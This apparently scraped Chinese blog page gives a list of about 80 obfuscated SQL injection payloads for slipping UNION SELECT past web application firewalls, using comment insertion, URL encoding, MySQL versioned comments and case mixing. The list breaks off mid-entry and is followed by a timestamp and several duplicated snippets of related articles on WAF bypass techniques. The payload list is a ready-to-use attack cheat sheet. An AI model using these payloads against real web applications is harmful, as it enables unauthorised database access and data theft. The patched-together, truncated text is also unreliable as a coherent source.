sql注入绕过union select过滤

  1 #
  2 #
  3 #
  4 #WAF Bypassing Strings:
  5
  6  /*!%55NiOn*/ /*!%53eLEct*/
  7
  8  %55nion(%53elect 1,2,3)-- -
  9
 10  +union+distinct+select+
 11
 12  +union+distinctROW+select+
 13
 14  /**//*!12345UNION SELECT*//**/
 15
 16  /**//*!50000UNION SELECT*//**/
 17
 18  /**/UNION/**//*!50000SELECT*//**/
 19
 20  /*!50000UniON SeLeCt*/
 21
 22  union /*!50000%53elect*/
 23
 24  +#uNiOn+#sEleCt
 25
 26  +#1q%0AuNiOn all#qa%0A#%0AsEleCt
 27
 28  /*!%55NiOn*/ /*!%53eLEct*/
 29
 30  /*!u%6eion*/ /*!se%6cect*/
 31
 32  +un/**/ion+se/**/lect
 33
 34  uni%0bon+se%0blect
 35
 36  %2f**%2funion%2f**%2fselect
 37
 38  union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
 39
 40  REVERSE(noinu)+REVERSE(tceles)
 41
 42  /*--*/union/*--*/select/*--*/
 43
 44  union (/*!/**/ SeleCT */ 1,2,3)
 45
 46  /*!union*/+/*!select*/
 47
 48  union+/*!select*/
 49
 50  /**/union/**/select/**/
 51
 52  /**/uNIon/**/sEleCt/**/
 53
 54  /**//*!union*//**//*!select*//**/
 55
 56  /*!uNIOn*/ /*!SelECt*/
 57
 58  +union+distinct+select+
 59
 60  +union+distinctROW+select+
 61
 62  +UnIOn%0d%0aSeleCt%0d%0a
 63
 64  UNION/*&test=1*/SELECT/*&pwn=2*/
 65
 66  un?+un/**/ion+se/**/lect+
 67
 68  +UNunionION+SEselectLECT+
 69
 70  +uni%0bon+se%0blect+
 71
 72  %252f%252a*/union%252f%252a /select%252f%252a*/
 73
 74  /%2A%2A/union/%2A%2A/select/%2A%2A/
 75
 76  %2f**%2funion%2f**%2fselect%2f**%2f
 77
 78  union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
 79
 80  /*!UnIoN*/SeLecT+
 81
 82 ##
 83 #
 84 #
 85 #Union Select by PASS with Url Encoded Method:
 86
 87    %55nion(%53elect)
 88
 89    union%20distinct%20select
 90
 91    union%20%64istinctRO%57%20select
 92
 93    union%2053elect
 94
 95    %23?%0auion%20?%23?%0aselect
 96
 97    %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
 98
 99    %55nion %53eLEct
100
101    u%6eion se%6cect
102
103    unio%6e %73elect
104
105    unio%6e%20%64istinc%74%20%73elect
106
107    uni%6fn distinct%52OW s%65lect
108
109    %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
时间: 2024-10-01 06:28:35

sql注入绕过union select过滤的相关文章

深入了解SQL注入绕过waf和过滤机制

知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料 0x00 前言 笔者前几天在做测试时输入攻击向量后页面发生了重定向甚至异常输入也是重定向怀疑其中有WAF在作怪.之前对WAF接触比较少纯粹是新手趁此科普了一下并查阅了一些绕过WAF的方法.所找到的资料中主要分为两类SQL注入和XSS绕过笔者SQL注入同样是新手

【转】深入理解SQL注入绕过WAF和过滤机制

原文 http://www.cnblogs.com/r00tgrok/p/SQL_Injection_Bypassing_WAF_And_Evasion_Of_Filter.html [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言 促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了,而且遇到异常输入直接发生重定向.之前对W

深入理解SQL注入绕过WAF与过滤机制

知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言 促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了,而且遇到异常输入直接发生重定向.之前对WAF并不太了解,因此趁此机会科普一下并查阅了一些绕过WAF的方法.网上关于绕过WAF有诸多文章,但是观察之后会发现大体上绕过WAF的方法就那八.九种,

深入了解SQL注入绕过waf和过滤机制(转)

知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料 0x00 前言 笔者前几天在做测试时输入攻击向量后页面发生了重定向甚至异常输入也是重定向怀疑其中有WAF在作怪.之前对WAF接触比较少纯粹是新手趁此科普了一下并查阅了一些绕过WAF的方法.所找到的资料中主要分为两类SQL注入和XSS绕过笔者SQL注入同样是新手

TSRC挑战赛:WAF之SQL注入绕过挑战实录

转自腾讯 博文作者:TSRC白帽子 发布日期:2014-09-03 阅读次数:1338 博文内容: 博文作者:lol [TSRC 白帽子] 第二作者:Conqu3r.花开若相惜 来自团队:[Pax.Mac Team] 应邀参加TSRC WAF防御绕过挑战赛,由于之前曾经和Team小伙伴一起参加过安全宝WAF挑战,而且自己平时接触WAF的机会也比较多,对于WAF绕过的方法还是有一定积累的. 比赛规则就是绕过四台被tencent WAF保护的测试服务器(分别为:apache GET.apache P

WAF的SQL注入绕过手段和防御技术

一.关于SQL注入 SQL注入是一种常见的入侵WEB应用的手法.SQL注入是利用应用系统的编程漏洞和SQL语言的语法特征,改变原始的SQL语句执行逻辑而产生的. 攻击者向Web应用发送精心构造的输入数据,这些输入中的一部分被解释成SQL指令,改变了原来的正常SQL执行逻辑,执行了攻击者发出的SQL命令,最终使攻击者获取Web应用的管理员权限或者下载了Web应用存到数据库中的敏感信息. 二.SQL注入如何实现 为了对本文进行更好的讲解,下面简单地对SQL注入的原理进行示例性说明. 如下图是某网站的

[转载]SQL注入绕过技巧汇总

转载一篇比较好的文章,乘心物游大佬写的. SQL注入的绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的.这篇文章就是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入的绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多.1.引号绕过 会使用到引号的地方是在于最后的where子句中.如下面的一条sql语句,这条语句就是一个简单的用来查选得到u

SQL注入绕过方式收集

一.%00截断 %00截断是上传漏洞中常用的一个非常经典的姿势,在SQL注入中,也可以用来绕过.在WAF层,接收参数id后,遇到%00截断,只获取到 id=1,无法获取到后面的有害参数输入: http://Host/sql.aspx?id=1%00and 1=2 union select 1,2,column_name from information_schema.columns 二.GET+POST 当同时提交GET.POST请求时,进入POST逻辑,而忽略了GET请求的有害参数输入,可轻易

SQL注入绕过某waf的详细过程。

0x00起因 看到大家都有绕waf的payload,想了想,这样下去不行啊.总不能找人家要吧,于是我开启了电脑,开始我的bypass之路. 0x01过程 准备完毕后,开始,首先判断注入and 1=1 Ok,2=2试试. 也不行,然后试试and -1=-1 然后是-1=-11 Ok判断绕过,于是咱们开始order by 拦截了,那么删除1试试 没有拦截,初步判断,他这里是检测数字,那么我们尝试/*!1*/ ok绕过,然后剩下的字段我就不截图了,得到字段是3,使用union来获取内容. 拦截,怎么看